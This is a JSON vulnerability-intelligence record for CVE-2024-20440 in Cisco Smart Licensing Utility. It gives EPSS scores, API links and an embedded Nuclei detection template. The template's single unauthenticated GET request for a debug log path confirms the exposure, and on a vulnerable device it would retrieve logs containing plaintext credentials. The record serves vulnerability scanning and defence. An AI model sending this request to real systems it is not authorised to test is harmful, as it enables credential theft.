{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-20440/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-20440/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-20440/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-20440/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-20440/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-20440"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-20440"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.51897,
      "kev": false,
      "percentile": 0.98902
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2024/CVE-2024-20440.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2024-20440\n\ninfo:\n  name: Cisco Smart Licensing Utility UnAuthenticated Logs Exposure Leaking Plaintext Credentials\n  author: iamnoooob,parthmalhotra,pdresearch\n  severity: high\n  description: |\n    A vulnerability in Cisco Smart Licensing Utility could allow an unauthenticated, remote attacker to access sensitive information.This vulnerability is due to excessive verbosity in a debug log file. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to obtain log files that contain sensitive data, including credentials that can be used to access the API.\n  impact: |\n    Unauthenticated attackers can access debug log files containing plaintext credentials and other sensitive information, enabling further attacks on the system.\n  remediation: |\n    Update Cisco Smart Licensing Utility to a version that prevents log file exposure.\n  reference:\n    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cslu-7gHMzWmw\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2024-20440\n    cwe-id: CWE-532\n    epss-score: 0.51897\n    epss-percentile: 0.98902\n  metadata:\n    verified: true\n    max-request: 1\n  tags: cve,cve2024,cisco,smart,licensing,info-leak,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"csluev.log\"\n\n      - type: word\n        part: content_type\n        words:\n          - \"text/x-log\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502201170017ee4c916e8d1fb7bffbb343b74477011d2e9d804980d2123931f0559ea022100d5e3241e281235e7ff3b68af2e8e130c577e74357f6c22c2cd4f574047acfc5c:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2024-20440"
}